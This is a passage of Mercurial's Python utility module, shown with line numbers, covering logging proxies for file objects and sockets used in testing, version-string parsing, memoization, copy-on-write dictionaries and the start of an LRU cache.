450 451 This type is intended to only be used for testing purposes. Think hard
451 452 before using it in important code.
452 453 """
453 454
454 455 __slots__ = (
455 456 '_orig',
456 457 '_observer',
457 458 )
458 459
459 460 def __init__(self, fh, observer):
460 461 object.__setattr__(self, '_orig', fh)
461 462 object.__setattr__(self, '_observer', observer)
462 463
463 464 def __getattribute__(self, name):
464 465 ours = {
465 466 '_observer',
466 467 # IOBase
467 468 'close',
468 469 # closed if a property
469 470 'fileno',
470 471 'flush',
471 472 'isatty',
472 473 'readable',
473 474 'readline',
474 475 'readlines',
475 476 'seek',
476 477 'seekable',
477 478 'tell',
478 479 'truncate',
479 480 'writable',
480 481 'writelines',
481 482 # RawIOBase
482 483 'read',
483 484 'readall',
484 485 'readinto',
485 486 'write',
486 487 # BufferedIOBase
487 488 # raw is a property
488 489 'detach',
489 490 # read defined above
490 491 'read1',
491 492 # readinto defined above
492 493 # write defined above
493 494 }
494 495
495 496 # We only observe some methods.
496 497 if name in ours:
497 498 return object.__getattribute__(self, name)
498 499
499 500 return getattr(object.__getattribute__(self, '_orig'), name)
500 501
501 502 def __nonzero__(self):
502 503 return bool(object.__getattribute__(self, '_orig'))
503 504
504 505 __bool__ = __nonzero__
505 506
506 507 def __delattr__(self, name):
507 508 return delattr(object.__getattribute__(self, '_orig'), name)
508 509
509 510 def __setattr__(self, name, value):
510 511 return setattr(object.__getattribute__(self, '_orig'), name, value)
511 512
512 513 def __iter__(self):
513 514 return object.__getattribute__(self, '_orig').__iter__()
514 515
515 516 def _observedcall(self, name, *args, **kwargs):
516 517 # Call the original object.
517 518 orig = object.__getattribute__(self, '_orig')
518 519 res = getattr(orig, name)(*args, **kwargs)
519 520
520 521 # Call a method on the observer of the same name with arguments
521 522 # so it can react, log, etc.
522 523 observer = object.__getattribute__(self, '_observer')
523 524 fn = getattr(observer, name, None)
524 525 if fn:
525 526 fn(res, *args, **kwargs)
526 527
527 528 return res
528 529
529 530 def close(self, *args, **kwargs):
530 531 return object.__getattribute__(self, '_observedcall')(
531 532 'close', *args, **kwargs
532 533 )
533 534
534 535 def fileno(self, *args, **kwargs):
535 536 return object.__getattribute__(self, '_observedcall')(
536 537 'fileno', *args, **kwargs
537 538 )
538 539
539 540 def flush(self, *args, **kwargs):
540 541 return object.__getattribute__(self, '_observedcall')(
541 542 'flush', *args, **kwargs
542 543 )
543 544
544 545 def isatty(self, *args, **kwargs):
545 546 return object.__getattribute__(self, '_observedcall')(
546 547 'isatty', *args, **kwargs
547 548 )
548 549
549 550 def readable(self, *args, **kwargs):
550 551 return object.__getattribute__(self, '_observedcall')(
551 552 'readable', *args, **kwargs
552 553 )
553 554
554 555 def readline(self, *args, **kwargs):
555 556 return object.__getattribute__(self, '_observedcall')(
556 557 'readline', *args, **kwargs
557 558 )
558 559
559 560 def readlines(self, *args, **kwargs):
560 561 return object.__getattribute__(self, '_observedcall')(
561 562 'readlines', *args, **kwargs
562 563 )
563 564
564 565 def seek(self, *args, **kwargs):
565 566 return object.__getattribute__(self, '_observedcall')(
566 567 'seek', *args, **kwargs
567 568 )
568 569
569 570 def seekable(self, *args, **kwargs):
570 571 return object.__getattribute__(self, '_observedcall')(
571 572 'seekable', *args, **kwargs
572 573 )
573 574
574 575 def tell(self, *args, **kwargs):
575 576 return object.__getattribute__(self, '_observedcall')(
576 577 'tell', *args, **kwargs
577 578 )
578 579
579 580 def truncate(self, *args, **kwargs):
580 581 return object.__getattribute__(self, '_observedcall')(
581 582 'truncate', *args, **kwargs
582 583 )
583 584
584 585 def writable(self, *args, **kwargs):
585 586 return object.__getattribute__(self, '_observedcall')(
586 587 'writable', *args, **kwargs
587 588 )
588 589
589 590 def writelines(self, *args, **kwargs):
590 591 return object.__getattribute__(self, '_observedcall')(
591 592 'writelines', *args, **kwargs
592 593 )
593 594
594 595 def read(self, *args, **kwargs):
595 596 return object.__getattribute__(self, '_observedcall')(
596 597 'read', *args, **kwargs
597 598 )
598 599
599 600 def readall(self, *args, **kwargs):
600 601 return object.__getattribute__(self, '_observedcall')(
601 602 'readall', *args, **kwargs
602 603 )
603 604
604 605 def readinto(self, *args, **kwargs):
605 606 return object.__getattribute__(self, '_observedcall')(
606 607 'readinto', *args, **kwargs
607 608 )
608 609
609 610 def write(self, *args, **kwargs):
610 611 return object.__getattribute__(self, '_observedcall')(
611 612 'write', *args, **kwargs
612 613 )
613 614
614 615 def detach(self, *args, **kwargs):
615 616 return object.__getattribute__(self, '_observedcall')(
616 617 'detach', *args, **kwargs
617 618 )
618 619
619 620 def read1(self, *args, **kwargs):
620 621 return object.__getattribute__(self, '_observedcall')(
621 622 'read1', *args, **kwargs
622 623 )
623 624
624 625
625 626 class observedbufferedinputpipe(bufferedinputpipe):
626 627 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
627 628
628 629 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
629 630 bypass ``fileobjectproxy``. Because of this, we need to make
630 631 ``bufferedinputpipe`` aware of these operations.
631 632
632 633 This variation of ``bufferedinputpipe`` can notify observers about
633 634 ``os.read()`` events. It also re-publishes other events, such as
634 635 ``read()`` and ``readline()``.
635 636 """
636 637
637 638 def _fillbuffer(self):
638 639 res = super(observedbufferedinputpipe, self)._fillbuffer()
639 640
640 641 fn = getattr(self._input._observer, 'osread', None)
641 642 if fn:
642 643 fn(res, _chunksize)
643 644
644 645 return res
645 646
646 647 # We use different observer methods because the operation isn't
647 648 # performed on the actual file object but on us.
648 649 def read(self, size):
649 650 res = super(observedbufferedinputpipe, self).read(size)
650 651
651 652 fn = getattr(self._input._observer, 'bufferedread', None)
652 653 if fn:
653 654 fn(res, size)
654 655
655 656 return res
656 657
657 658 def readline(self, *args, **kwargs):
658 659 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
659 660
660 661 fn = getattr(self._input._observer, 'bufferedreadline', None)
661 662 if fn:
662 663 fn(res)
663 664
664 665 return res
665 666
666 667
667 668 PROXIED_SOCKET_METHODS = {
668 669 'makefile',
669 670 'recv',
670 671 'recvfrom',
671 672 'recvfrom_into',
672 673 'recv_into',
673 674 'send',
674 675 'sendall',
675 676 'sendto',
676 677 'setblocking',
677 678 'settimeout',
678 679 'gettimeout',
679 680 'setsockopt',
680 681 }
681 682
682 683
683 684 class socketproxy(object):
684 685 """A proxy around a socket that tells a watcher when events occur.
685 686
686 687 This is like ``fileobjectproxy`` except for sockets.
687 688
688 689 This type is intended to only be used for testing purposes. Think hard
689 690 before using it in important code.
690 691 """
691 692
692 693 __slots__ = (
693 694 '_orig',
694 695 '_observer',
695 696 )
696 697
697 698 def __init__(self, sock, observer):
698 699 object.__setattr__(self, '_orig', sock)
699 700 object.__setattr__(self, '_observer', observer)
700 701
701 702 def __getattribute__(self, name):
702 703 if name in PROXIED_SOCKET_METHODS:
703 704 return object.__getattribute__(self, name)
704 705
705 706 return getattr(object.__getattribute__(self, '_orig'), name)
706 707
707 708 def __delattr__(self, name):
708 709 return delattr(object.__getattribute__(self, '_orig'), name)
709 710
710 711 def __setattr__(self, name, value):
711 712 return setattr(object.__getattribute__(self, '_orig'), name, value)
712 713
713 714 def __nonzero__(self):
714 715 return bool(object.__getattribute__(self, '_orig'))
715 716
716 717 __bool__ = __nonzero__
717 718
718 719 def _observedcall(self, name, *args, **kwargs):
719 720 # Call the original object.
720 721 orig = object.__getattribute__(self, '_orig')
721 722 res = getattr(orig, name)(*args, **kwargs)
722 723
723 724 # Call a method on the observer of the same name with arguments
724 725 # so it can react, log, etc.
725 726 observer = object.__getattribute__(self, '_observer')
726 727 fn = getattr(observer, name, None)
727 728 if fn:
728 729 fn(res, *args, **kwargs)
729 730
730 731 return res
731 732
732 733 def makefile(self, *args, **kwargs):
733 734 res = object.__getattribute__(self, '_observedcall')(
734 735 'makefile', *args, **kwargs
735 736 )
736 737
737 738 # The file object may be used for I/O. So we turn it into a
738 739 # proxy using our observer.
739 740 observer = object.__getattribute__(self, '_observer')
740 741 return makeloggingfileobject(
741 742 observer.fh,
742 743 res,
743 744 observer.name,
744 745 reads=observer.reads,
745 746 writes=observer.writes,
746 747 logdata=observer.logdata,
747 748 logdataapis=observer.logdataapis,
748 749 )
749 750
750 751 def recv(self, *args, **kwargs):
751 752 return object.__getattribute__(self, '_observedcall')(
752 753 'recv', *args, **kwargs
753 754 )
754 755
755 756 def recvfrom(self, *args, **kwargs):
756 757 return object.__getattribute__(self, '_observedcall')(
757 758 'recvfrom', *args, **kwargs
758 759 )
759 760
760 761 def recvfrom_into(self, *args, **kwargs):
761 762 return object.__getattribute__(self, '_observedcall')(
762 763 'recvfrom_into', *args, **kwargs
763 764 )
764 765
765 766 def recv_into(self, *args, **kwargs):
766 767 return object.__getattribute__(self, '_observedcall')(
767 768 'recv_into', *args, **kwargs
768 769 )
769 770
770 771 def send(self, *args, **kwargs):
771 772 return object.__getattribute__(self, '_observedcall')(
772 773 'send', *args, **kwargs
773 774 )
774 775
775 776 def sendall(self, *args, **kwargs):
776 777 return object.__getattribute__(self, '_observedcall')(
777 778 'sendall', *args, **kwargs
778 779 )
779 780
780 781 def sendto(self, *args, **kwargs):
781 782 return object.__getattribute__(self, '_observedcall')(
782 783 'sendto', *args, **kwargs
783 784 )
784 785
785 786 def setblocking(self, *args, **kwargs):
786 787 return object.__getattribute__(self, '_observedcall')(
787 788 'setblocking', *args, **kwargs
788 789 )
789 790
790 791 def settimeout(self, *args, **kwargs):
791 792 return object.__getattribute__(self, '_observedcall')(
792 793 'settimeout', *args, **kwargs
793 794 )
794 795
795 796 def gettimeout(self, *args, **kwargs):
796 797 return object.__getattribute__(self, '_observedcall')(
797 798 'gettimeout', *args, **kwargs
798 799 )
799 800
800 801 def setsockopt(self, *args, **kwargs):
801 802 return object.__getattribute__(self, '_observedcall')(
802 803 'setsockopt', *args, **kwargs
803 804 )
804 805
805 806
806 807 class baseproxyobserver(object):
807 808 def __init__(self, fh, name, logdata, logdataapis):
808 809 self.fh = fh
809 810 self.name = name
810 811 self.logdata = logdata
811 812 self.logdataapis = logdataapis
812 813
813 814 def _writedata(self, data):
814 815 if not self.logdata:
815 816 if self.logdataapis:
816 817 self.fh.write(b'\n')
817 818 self.fh.flush()
818 819 return
819 820
820 821 # Simple case writes all data on a single line.
821 822 if b'\n' not in data:
822 823 if self.logdataapis:
823 824 self.fh.write(b': %s\n' % stringutil.escapestr(data))
824 825 else:
825 826 self.fh.write(
826 827 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
827 828 )
828 829 self.fh.flush()
829 830 return
830 831
831 832 # Data with newlines is written to multiple lines.
832 833 if self.logdataapis:
833 834 self.fh.write(b':\n')
834 835
835 836 lines = data.splitlines(True)
836 837 for line in lines:
837 838 self.fh.write(
838 839 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
839 840 )
840 841 self.fh.flush()
841 842
842 843
843 844 class fileobjectobserver(baseproxyobserver):
844 845 """Logs file object activity."""
845 846
846 847 def __init__(
847 848 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
848 849 ):
849 850 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
850 851 self.reads = reads
851 852 self.writes = writes
852 853
853 854 def read(self, res, size=-1):
854 855 if not self.reads:
855 856 return
856 857 # Python 3 can return None from reads at EOF instead of empty strings.
857 858 if res is None:
858 859 res = b''
859 860
860 861 if size == -1 and res == b'':
861 862 # Suppress pointless read(-1) calls that return
862 863 # nothing. These happen _a lot_ on Python 3, and there
863 864 # doesn't seem to be a better workaround to have matching
864 865 # Python 2 and 3 behavior. :(
865 866 return
866 867
867 868 if self.logdataapis:
868 869 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
869 870
870 871 self._writedata(res)
871 872
872 873 def readline(self, res, limit=-1):
873 874 if not self.reads:
874 875 return
875 876
876 877 if self.logdataapis:
877 878 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
878 879
879 880 self._writedata(res)
880 881
881 882 def readinto(self, res, dest):
882 883 if not self.reads:
883 884 return
884 885
885 886 if self.logdataapis:
886 887 self.fh.write(
887 888 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
888 889 )
889 890
890 891 data = dest[0:res] if res is not None else b''
891 892
892 893 # _writedata() uses "in" operator and is confused by memoryview because
893 894 # characters are ints on Python 3.
894 895 if isinstance(data, memoryview):
895 896 data = data.tobytes()
896 897
897 898 self._writedata(data)
898 899
899 900 def write(self, res, data):
900 901 if not self.writes:
901 902 return
902 903
903 904 # Python 2 returns None from some write() calls. Python 3 (reasonably)
904 905 # returns the integer bytes written.
905 906 if res is None and data:
906 907 res = len(data)
907 908
908 909 if self.logdataapis:
909 910 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
910 911
911 912 self._writedata(data)
912 913
913 914 def flush(self, res):
914 915 if not self.writes:
915 916 return
916 917
917 918 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
918 919
919 920 # For observedbufferedinputpipe.
920 921 def bufferedread(self, res, size):
921 922 if not self.reads:
922 923 return
923 924
924 925 if self.logdataapis:
925 926 self.fh.write(
926 927 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
927 928 )
928 929
929 930 self._writedata(res)
930 931
931 932 def bufferedreadline(self, res):
932 933 if not self.reads:
933 934 return
934 935
935 936 if self.logdataapis:
936 937 self.fh.write(
937 938 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
938 939 )
939 940
940 941 self._writedata(res)
941 942
942 943
943 944 def makeloggingfileobject(
944 945 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
945 946 ):
946 947 """Turn a file object into a logging file object."""
947 948
948 949 observer = fileobjectobserver(
949 950 logh,
950 951 name,
951 952 reads=reads,
952 953 writes=writes,
953 954 logdata=logdata,
954 955 logdataapis=logdataapis,
955 956 )
956 957 return fileobjectproxy(fh, observer)
957 958
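# Illustrative sketch, not part of the original module: wrapping an in-memory
# file with makeloggingfileobject so that read()/write() calls are recorded on
# a separate log handle. The helper name and sample values are hypothetical.
def _makeloggingfileobject_sketch():
    logfh = stringio()
    proxied = makeloggingfileobject(logfh, stringio(b'payload'), b'example')
    proxied.read(4)  # the observer logs b'example> read(4) -> 4\n'
    proxied.write(b'!')  # the observer logs b'example> write(1) -> 1\n'
    return logfh.getvalue()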
958 959
959 960 class socketobserver(baseproxyobserver):
960 961 """Logs socket activity."""
961 962
962 963 def __init__(
963 964 self,
964 965 fh,
965 966 name,
966 967 reads=True,
967 968 writes=True,
968 969 states=True,
969 970 logdata=False,
970 971 logdataapis=True,
971 972 ):
972 973 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
973 974 self.reads = reads
974 975 self.writes = writes
975 976 self.states = states
976 977
977 978 def makefile(self, res, mode=None, bufsize=None):
978 979 if not self.states:
979 980 return
980 981
981 982 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
982 983
983 984 def recv(self, res, size, flags=0):
984 985 if not self.reads:
985 986 return
986 987
987 988 if self.logdataapis:
988 989 self.fh.write(
989 990 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
990 991 )
991 992 self._writedata(res)
992 993
993 994 def recvfrom(self, res, size, flags=0):
994 995 if not self.reads:
995 996 return
996 997
997 998 if self.logdataapis:
998 999 self.fh.write(
999 1000 b'%s> recvfrom(%d, %d) -> %d'
1000 1001 % (self.name, size, flags, len(res[0]))
1001 1002 )
1002 1003
1003 1004 self._writedata(res[0])
1004 1005
1005 1006 def recvfrom_into(self, res, buf, size, flags=0):
1006 1007 if not self.reads:
1007 1008 return
1008 1009
1009 1010 if self.logdataapis:
1010 1011 self.fh.write(
1011 1012 b'%s> recvfrom_into(%d, %d) -> %d'
1012 1013 % (self.name, size, flags, res[0])
1013 1014 )
1014 1015
1015 1016 self._writedata(buf[0 : res[0]])
1016 1017
1017 1018 def recv_into(self, res, buf, size=0, flags=0):
1018 1019 if not self.reads:
1019 1020 return
1020 1021
1021 1022 if self.logdataapis:
1022 1023 self.fh.write(
1023 1024 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1024 1025 )
1025 1026
1026 1027 self._writedata(buf[0:res])
1027 1028
1028 1029 def send(self, res, data, flags=0):
1029 1030 if not self.writes:
1030 1031 return
1031 1032
1032 1033 self.fh.write(
1033 1034 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1034 1035 )
1035 1036 self._writedata(data)
1036 1037
1037 1038 def sendall(self, res, data, flags=0):
1038 1039 if not self.writes:
1039 1040 return
1040 1041
1041 1042 if self.logdataapis:
1042 1043 # Returns None on success. So don't bother reporting return value.
1043 1044 self.fh.write(
1044 1045 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1045 1046 )
1046 1047
1047 1048 self._writedata(data)
1048 1049
1049 1050 def sendto(self, res, data, flagsoraddress, address=None):
1050 1051 if not self.writes:
1051 1052 return
1052 1053
1053 1054 if address:
1054 1055 flags = flagsoraddress
1055 1056 else:
1056 1057 flags = 0
1057 1058
1058 1059 if self.logdataapis:
1059 1060 self.fh.write(
1060 1061 b'%s> sendto(%d, %d, %r) -> %d'
1061 1062 % (self.name, len(data), flags, address, res)
1062 1063 )
1063 1064
1064 1065 self._writedata(data)
1065 1066
1066 1067 def setblocking(self, res, flag):
1067 1068 if not self.states:
1068 1069 return
1069 1070
1070 1071 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1071 1072
1072 1073 def settimeout(self, res, value):
1073 1074 if not self.states:
1074 1075 return
1075 1076
1076 1077 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1077 1078
1078 1079 def gettimeout(self, res):
1079 1080 if not self.states:
1080 1081 return
1081 1082
1082 1083 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1083 1084
1084 1085 def setsockopt(self, res, level, optname, value):
1085 1086 if not self.states:
1086 1087 return
1087 1088
1088 1089 self.fh.write(
1089 1090 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1090 1091 % (self.name, level, optname, value, res)
1091 1092 )
1092 1093
1093 1094
1094 1095 def makeloggingsocket(
1095 1096 logh,
1096 1097 fh,
1097 1098 name,
1098 1099 reads=True,
1099 1100 writes=True,
1100 1101 states=True,
1101 1102 logdata=False,
1102 1103 logdataapis=True,
1103 1104 ):
1104 1105 """Turn a socket into a logging socket."""
1105 1106
1106 1107 observer = socketobserver(
1107 1108 logh,
1108 1109 name,
1109 1110 reads=reads,
1110 1111 writes=writes,
1111 1112 states=states,
1112 1113 logdata=logdata,
1113 1114 logdataapis=logdataapis,
1114 1115 )
1115 1116 return socketproxy(fh, observer)
1116 1117
1117 1118
1118 1119 def version():
1119 1120 """Return version information if available."""
1120 1121 try:
1121 1122 from . import __version__
1122 1123
1123 1124 return __version__.version
1124 1125 except ImportError:
1125 1126 return b'unknown'
1126 1127
1127 1128
1128 1129 def versiontuple(v=None, n=4):
1129 1130 """Parses a Mercurial version string into an N-tuple.
1130 1131
1131 1132 The version string to be parsed is specified with the ``v`` argument.
1132 1133 If it isn't defined, the current Mercurial version string will be parsed.
1133 1134
1134 1135 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1135 1136 returned values:
1136 1137
1137 1138 >>> v = b'3.6.1+190-df9b73d2d444'
1138 1139 >>> versiontuple(v, 2)
1139 1140 (3, 6)
1140 1141 >>> versiontuple(v, 3)
1141 1142 (3, 6, 1)
1142 1143 >>> versiontuple(v, 4)
1143 1144 (3, 6, 1, '190-df9b73d2d444')
1144 1145
1145 1146 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1146 1147 (3, 6, 1, '190-df9b73d2d444+20151118')
1147 1148
1148 1149 >>> v = b'3.6'
1149 1150 >>> versiontuple(v, 2)
1150 1151 (3, 6)
1151 1152 >>> versiontuple(v, 3)
1152 1153 (3, 6, None)
1153 1154 >>> versiontuple(v, 4)
1154 1155 (3, 6, None, None)
1155 1156
1156 1157 >>> v = b'3.9-rc'
1157 1158 >>> versiontuple(v, 2)
1158 1159 (3, 9)
1159 1160 >>> versiontuple(v, 3)
1160 1161 (3, 9, None)
1161 1162 >>> versiontuple(v, 4)
1162 1163 (3, 9, None, 'rc')
1163 1164
1164 1165 >>> v = b'3.9-rc+2-02a8fea4289b'
1165 1166 >>> versiontuple(v, 2)
1166 1167 (3, 9)
1167 1168 >>> versiontuple(v, 3)
1168 1169 (3, 9, None)
1169 1170 >>> versiontuple(v, 4)
1170 1171 (3, 9, None, 'rc+2-02a8fea4289b')
1171 1172
1172 1173 >>> versiontuple(b'4.6rc0')
1173 1174 (4, 6, None, 'rc0')
1174 1175 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1175 1176 (4, 6, None, 'rc0+12-425d55e54f98')
1176 1177 >>> versiontuple(b'.1.2.3')
1177 1178 (None, None, None, '.1.2.3')
1178 1179 >>> versiontuple(b'12.34..5')
1179 1180 (12, 34, None, '..5')
1180 1181 >>> versiontuple(b'1.2.3.4.5.6')
1181 1182 (1, 2, 3, '.4.5.6')
1182 1183 """
1183 1184 if not v:
1184 1185 v = version()
1185 1186 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1186 1187 if not m:
1187 1188 vparts, extra = b'', v
1188 1189 elif m.group(2):
1189 1190 vparts, extra = m.groups()
1190 1191 else:
1191 1192 vparts, extra = m.group(1), None
1192 1193
1193 1194 assert vparts is not None # help pytype
1194 1195
1195 1196 vints = []
1196 1197 for i in vparts.split(b'.'):
1197 1198 try:
1198 1199 vints.append(int(i))
1199 1200 except ValueError:
1200 1201 break
1201 1202 # (3, 6) -> (3, 6, None)
1202 1203 while len(vints) < 3:
1203 1204 vints.append(None)
1204 1205
1205 1206 if n == 2:
1206 1207 return (vints[0], vints[1])
1207 1208 if n == 3:
1208 1209 return (vints[0], vints[1], vints[2])
1209 1210 if n == 4:
1210 1211 return (vints[0], vints[1], vints[2], extra)
1211 1212
1212 1213
1213 1214 def cachefunc(func):
1214 1215 '''cache the result of function calls'''
1215 1216 # XXX doesn't handle keyword args
1216 1217 if func.__code__.co_argcount == 0:
1217 1218 listcache = []
1218 1219
1219 1220 def f():
1220 1221 if len(listcache) == 0:
1221 1222 listcache.append(func())
1222 1223 return listcache[0]
1223 1224
1224 1225 return f
1225 1226 cache = {}
1226 1227 if func.__code__.co_argcount == 1:
1227 1228 # we gain a small amount of time because
1228 1229 # we don't need to pack/unpack the list
1229 1230 def f(arg):
1230 1231 if arg not in cache:
1231 1232 cache[arg] = func(arg)
1232 1233 return cache[arg]
1233 1234
1234 1235 else:
1235 1236
1236 1237 def f(*args):
1237 1238 if args not in cache:
1238 1239 cache[args] = func(*args)
1239 1240 return cache[args]
1240 1241
1241 1242 return f
1242 1243
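# Illustrative sketch, not part of the original module: cachefunc memoizes on
# positional arguments, so a second call with the same argument reuses the
# first result. The helper name and sample function are hypothetical.
def _cachefunc_sketch():
    calls = []

    def square(x):
        calls.append(x)
        return x * x

    cached = cachefunc(square)
    assert cached(3) == 9
    assert cached(3) == 9  # served from the cache
    assert calls == [3]  # the wrapped function ran only once
    return cached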
1243 1244
1244 1245 class cow(object):
1245 1246 """helper class to make copy-on-write easier
1246 1247
1247 1248 Call preparewrite before doing any writes.
1248 1249 """
1249 1250
1250 1251 def preparewrite(self):
1251 1252 """call this before writes, return self or a copied new object"""
1252 1253 if getattr(self, '_copied', 0):
1253 1254 self._copied -= 1
1254 1255 return self.__class__(self)
1255 1256 return self
1256 1257
1257 1258 def copy(self):
1258 1259 """always do a cheap copy"""
1259 1260 self._copied = getattr(self, '_copied', 0) + 1
1260 1261 return self
1261 1262
1262 1263
1263 1264 class sortdict(collections.OrderedDict):
1264 1265 '''a simple sorted dictionary
1265 1266
1266 1267 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1267 1268 >>> d2 = d1.copy()
1268 1269 >>> d2
1269 1270 sortdict([('a', 0), ('b', 1)])
1270 1271 >>> d2.update([(b'a', 2)])
1271 1272 >>> list(d2.keys()) # should still be in last-set order
1272 1273 ['b', 'a']
1273 1274 >>> d1.insert(1, b'a.5', 0.5)
1274 1275 >>> d1
1275 1276 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1276 1277 '''
1277 1278
1278 1279 def __setitem__(self, key, value):
1279 1280 if key in self:
1280 1281 del self[key]
1281 1282 super(sortdict, self).__setitem__(key, value)
1282 1283
1283 1284 if pycompat.ispypy:
1284 1285 # __setitem__() isn't called as of PyPy 5.8.0
1285 1286 def update(self, src):
1286 1287 if isinstance(src, dict):
1287 1288 src = pycompat.iteritems(src)
1288 1289 for k, v in src:
1289 1290 self[k] = v
1290 1291
1291 1292 def insert(self, position, key, value):
1292 1293 for (i, (k, v)) in enumerate(list(self.items())):
1293 1294 if i == position:
1294 1295 self[key] = value
1295 1296 if i >= position:
1296 1297 del self[k]
1297 1298 self[k] = v
1298 1299
1299 1300
1300 1301 class cowdict(cow, dict):
1301 1302 """copy-on-write dict
1302 1303
1303 1304 Be sure to call d = d.preparewrite() before writing to d.
1304 1305
1305 1306 >>> a = cowdict()
1306 1307 >>> a is a.preparewrite()
1307 1308 True
1308 1309 >>> b = a.copy()
1309 1310 >>> b is a
1310 1311 True
1311 1312 >>> c = b.copy()
1312 1313 >>> c is a
1313 1314 True
1314 1315 >>> a = a.preparewrite()
1315 1316 >>> b is a
1316 1317 False
1317 1318 >>> a is a.preparewrite()
1318 1319 True
1319 1320 >>> c = c.preparewrite()
1320 1321 >>> b is c
1321 1322 False
1322 1323 >>> b is b.preparewrite()
1323 1324 True
1324 1325 """
1325 1326
1326 1327
1327 1328 class cowsortdict(cow, sortdict):
1328 1329 """copy-on-write sortdict
1329 1330
1330 1331 Be sure to call d = d.preparewrite() before writing to d.
1331 1332 """
1332 1333
1333 1334
1334 1335 class transactional(object): # pytype: disable=ignored-metaclass
1335 1336 """Base class for making a transactional type into a context manager."""
1336 1337
1337 1338 __metaclass__ = abc.ABCMeta
1338 1339
1339 1340 @abc.abstractmethod
1340 1341 def close(self):
1341 1342 """Successfully closes the transaction."""
1342 1343
1343 1344 @abc.abstractmethod
1344 1345 def release(self):
1345 1346 """Marks the end of the transaction.
1346 1347
1347 1348 If the transaction has not been closed, it will be aborted.
1348 1349 """
1349 1350
1350 1351 def __enter__(self):
1351 1352 return self
1352 1353
1353 1354 def __exit__(self, exc_type, exc_val, exc_tb):
1354 1355 try:
1355 1356 if exc_type is None:
1356 1357 self.close()
1357 1358 finally:
1358 1359 self.release()
1359 1360
1360 1361
1361 1362 @contextlib.contextmanager
1362 1363 def acceptintervention(tr=None):
1363 1364 """A context manager that closes the transaction on InterventionRequired
1364 1365
1365 1366 If no transaction was provided, this simply runs the body and returns
1366 1367 """
1367 1368 if not tr:
1368 1369 yield
1369 1370 return
1370 1371 try:
1371 1372 yield
1372 1373 tr.close()
1373 1374 except error.InterventionRequired:
1374 1375 tr.close()
1375 1376 raise
1376 1377 finally:
1377 1378 tr.release()
1378 1379
1379 1380
1380 1381 @contextlib.contextmanager
1381 1382 def nullcontextmanager():
1382 1383 yield
1383 1384
1384 1385
1385 1386 class _lrucachenode(object):
1386 1387 """A node in a doubly linked list.
1387 1388
1388 1389 Holds a reference to nodes on either side as well as a key-value
1389 1390 pair for the dictionary entry.
1390 1391 """
1391 1392
1392 1393 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1393 1394
1394 1395 def __init__(self):
1395 1396 self.next = None
1396 1397 self.prev = None
1397 1398
1398 1399 self.key = _notset
1399 1400 self.value = None
1400 1401 self.cost = 0
1401 1402
1402 1403 def markempty(self):
1403 1404 """Mark the node as emptied."""
1404 1405 self.key = _notset
1405 1406 self.value = None
1406 1407 self.cost = 0
1407 1408
1408 1409
1409 1410 class lrucachedict(object):
1410 1411 """Dict that caches most recent accesses and sets.
1411 1412
1412 1413 The dict consists of an actual backing dict - indexed by original
1413 1414 key - and a doubly linked circular list defining the order of entries in
1414 1415 the cache.
1415 1416
1416 1417 The head node is the newest entry in the cache. If the cache is full,
1417 1418 we recycle head.prev and make it the new head. Cache accesses result in
1418 1419 the node being moved to before the existing head and being marked as the
1419 1420 new head node.
1420 1421
1421 1422 Items in the cache can be inserted with an optional "cost" value. This is
1422 1423 simply an integer that is specified by the caller. The cache can be queried
1423 1424 for the total cost of all items presently in the cache.
1424 1425
1425 1426 The cache can also define a maximum cost. If a cache insertion would
1426 1427 cause the total cost of the cache to go beyond the maximum cost limit,
1427 1428 nodes will be evicted to make room for the new node. This can be used
1428 1429 to e.g. set a max memory limit and associate an estimated bytes size
1429 1430 cost to each item in the cache. By default, no maximum cost is enforced.
1430 1431 """
1431 1432
1432 1433 def __init__(self, max, maxcost=0):
1433 1434 self._cache = {}
1434 1435
1435 1436 self._head = head = _lrucachenode()
1436 1437 head.prev = head
1437 1438 head.next = head
1438 1439 self._size = 1
1439 1440 self.capacity = max
1440 1441 self.totalcost = 0
1441 1442 self.maxcost = maxcost
1442 1443
1443 1444 def __len__(self):
1444 1445 return len(self._cache)
1445 1446
1446 1447 def __contains__(self, k):
1447 1448 return k in self._cache
1448 1449
1449 1450 def __iter__(self):
1450 1451 # We don't have to iterate in cache order, but why not.
1451 1452 n = self._head
1452 1453 for i in range(len(self._cache)):
1453 1454 yield n.key
1454 1455 n = n.next
1455 1456
1456 1457 def __getitem__(self, k):
1457 1458 node = self._cache[k]
1458 1459 self._movetohead(node)
1459 1460 return node.value
1460 1461
1461 1462 def insert(self, k, v, cost=0):
1462 1463 """Insert a new item in the cache with optional cost value."""
1463 1464 node = self._cache.get(k)
1464 1465 # Replace existing value and mark as newest.
1465 1466 if node is not None:
1466 1467 self.totalcost -= node.cost
1467 1468 node.value = v
1468 1469 node.cost = cost
1469 1470 self.totalcost += cost
